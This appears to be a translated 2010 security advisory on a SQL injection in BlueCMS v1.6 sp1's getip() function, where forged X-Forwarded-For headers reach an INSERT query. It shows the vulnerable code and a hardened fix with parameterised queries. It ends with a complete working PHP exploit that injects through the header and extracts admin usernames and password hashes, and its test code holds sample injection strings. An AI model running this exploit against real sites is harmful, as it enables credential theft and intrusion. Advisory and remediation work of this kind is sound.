BlueCMS v1.6 sp1 $_SERVER injection vulnerability - vulnerability warning - the black bar safety net

2010-09-14T00:00:00
ID MYHACK58:62201027861
Type myhack58
Reporter 佚名 (anonymous)
Modified 2010-09-14T00:00:00

Description

Affected version:

v1.6 sp1

Vulnerability description:

BlueCMS is a CMS system dedicated to local classified-information portals. The program does not strictly filter the data when it uses the getip() function to obtain the client IP, resulting in a SQL injection vulnerability.

// comment.php

```php
$sql = "INSERT INTO ".table('comment')." (com_id, post_id, user_id, type, mood, content, pub_date, ip, is_check)
        VALUES ('', '$id', '$user_id', '$type', '$mood', '$content', '$timestamp', '".getip()."', '$is_check')"; // note getip()
$db->query($sql);
```

Now look at the function itself, in include/common.fun.php:

```php
function getip()
{
    if (getenv('HTTP_CLIENT_IP')) {
        $ip = getenv('HTTP_CLIENT_IP');        // can be forged
    } elseif (getenv('HTTP_X_FORWARDED_FOR')) {
        $ip = getenv('HTTP_X_FORWARDED_FOR');  // can be forged
    } elseif (getenv('HTTP_X_FORWARDED')) {
        $ip = getenv('HTTP_X_FORWARDED');
    } elseif (getenv('HTTP_FORWARDED_FOR')) {
        $ip = getenv('HTTP_FORWARDED_FOR');
    } elseif (getenv('HTTP_FORWARDED')) {
        $ip = getenv('HTTP_FORWARDED');
    } else {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}
```

The vulnerability is simple: the old $_SERVER problem. Every header-derived value that getip() prefers (HTTP_CLIENT_IP, HTTP_X_FORWARDED_FOR, and so on) is supplied by the client, so the function returns attacker-controlled text that comment.php concatenates straight into the INSERT statement without escaping.
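The fix has two independent parts: never trust proxy headers unless the request really came from a known proxy, and never build the INSERT by string concatenation. The following is an added example written for this page, not BlueCMS code. It assumes PDO with a MySQL connection, a table named `blue_comment` (the page only shows `table('comment')` and the `blue_` prefix), and a `TRUSTED_PROXIES` list that is a deployment-specific value.

```php
<?php
// Added example, not part of BlueCMS: a hardened getip() and a parameterised
// comment INSERT. TRUSTED_PROXIES and the blue_comment table name are assumed.

const TRUSTED_PROXIES = ['10.0.0.5'];   // assumed: addresses of your own reverse proxies

/**
 * Return a validated client IP. REMOTE_ADDR comes from the TCP peer and cannot
 * be set by a request header; X-Forwarded-For is consulted only when the peer
 * is a trusted proxy, and even then the value must parse as an IP address.
 */
function getip_safe(array $server): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return '0.0.0.0';
    }
    if (in_array($remote, TRUSTED_PROXIES, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        // XFF is "client, proxy1, proxy2"; the left-most entry is the original client
        $first = trim(explode(',', $server['HTTP_X_FORWARDED_FOR'])[0]);
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) {
            return $first;
        }
    }
    return $remote;   // header forged, malformed, or sent by an untrusted peer: ignore it
}

/**
 * Insert a comment with bound parameters. Even if some caller passed an
 * unvalidated string as $ip, it would be stored as data, not parsed as SQL.
 */
function insert_comment(PDO $db, array $server, int $postId, int $userId,
                        int $type, int $mood, string $content, int $isCheck): void
{
    $sql = "INSERT INTO blue_comment (post_id, user_id, type, mood, content, pub_date, ip, is_check)
            VALUES (:post_id, :user_id, :type, :mood, :content, :pub_date, :ip, :is_check)";
    $stmt = $db->prepare($sql);
    $stmt->execute([
        ':post_id'  => $postId,
        ':user_id'  => $userId,
        ':type'     => $type,
        ':mood'     => $mood,
        ':content'  => $content,
        ':pub_date' => time(),
        ':ip'       => getip_safe($server),
        ':is_check' => $isCheck,
    ]);
}

// Constructed request arrays for a quick check of getip_safe().
// Direct client sending a forged header: the header is ignored.
$forged = [
    'REMOTE_ADDR'          => '203.0.113.7',
    'HTTP_X_FORWARDED_FOR' => "0','1'),('','1','0','1','6',(select 1),'0','0",
];
echo getip_safe($forged), "\n";   // 203.0.113.7

// Request relayed by the trusted proxy: the left-most XFF entry is used.
$viaProxy = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '198.51.100.23, 10.0.0.5',
];
echo getip_safe($viaProxy), "\n"; // 198.51.100.23

// Trusted proxy but non-IP junk in the header: fall back to the peer address.
$junk = ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => "1' or '1'='1"];
echo getip_safe($junk), "\n";     // 10.0.0.5
```

The `getip_safe()` check alone already stops the injection shown on this page, because the forged header never reaches the query; the prepared statement is defence in depth so that a future caller cannot reintroduce the concatenation.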

Reference:

> http://hi.baidu.com/cnryan/blog/item/837d4551f8069c818d54300a.html

Test method:

[www.sebug.net] The programs (methods) provided by this site may be offensive in nature and are for security research and teaching purposes only; use them at your own risk!

```php
<?php
print_r('
+---------------------------------------------------------------------------+
BlueCMS v1.6 sp1 Getip() Remote SQL Injection Exploit
by cnryan
Mail: cnryan2008[at]gmail[dot]com
Blog: http://hi.baidu.com/cnryan
+---------------------------------------------------------------------------+
');

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Example: php '.$argv[0].' localhost /bluecms/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

send();
send2();

// Post a comment; the payload travels in X-Forwarded-For, which getip() returns unfiltered
function send()
{
    global $host, $path;
    $cmd = "mood=6&comment=test&id=1&type=1&submit=%CC%E1%BD%BB%C6%C0%C2%DB";
    $getinj = "00','1'),('','1','0','1','6',(select concat('<u-',admin_name,'-u><p-',pwd,'-p>') from blue_admin),'1281181973','99";
    $data  = "POST ".$path."comment.php?act=send HTTP/1.1\r\n";
    $data .= "Accept: */*\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Content-Length: ".strlen($cmd)."\r\n";
    $data .= "Connection: Close\r\n";
    $data .= "X-Forwarded-For: $getinj\r\n\r\n";
    $data .= $cmd;

    $fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = '';
    while ($fp && !feof($fp)) $resp .= fread($fp, 1024);

    return $resp;
}

// Fetch the page where the injected comment is displayed and read the marker back
function send2()
{
    global $host, $path;
    $message  = "GET ".$path."news.php?id=1 HTTP/1.1\r\n";
    $message .= "Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Accept-Encoding: gzip, deflate\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; GreenBrowser)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Connection: Keep-Alive\r\n\r\n";

    $fd = fsockopen($host, 80);
    if (!$fd) {
        echo '[-]No response from '.$host;
        die;
    }
    fputs($fd, $message);

    $resp = '';
    while (!feof($fd)) {
        $resp .= fgets($fd);
    }
    fclose($fd);

    preg_match_all("/<u-([^<]*)-u><p-([^<]*)-p>/", $resp, $db);
    if ($db[1][0] & $db[2][0]) {
        echo "username->".$db[1][0]."\r\n";
        echo "password->".$db[2][0]."\r\n";
        echo "[+]congratulation ^ ^";
    } else {
        die('[-]exploited fail >"<');
    }
}
?>
```

Vendor patch:

The vendor has not yet provided a patch or upgrade procedure; users of this software are advised to follow the vendor's home page to obtain the latest version: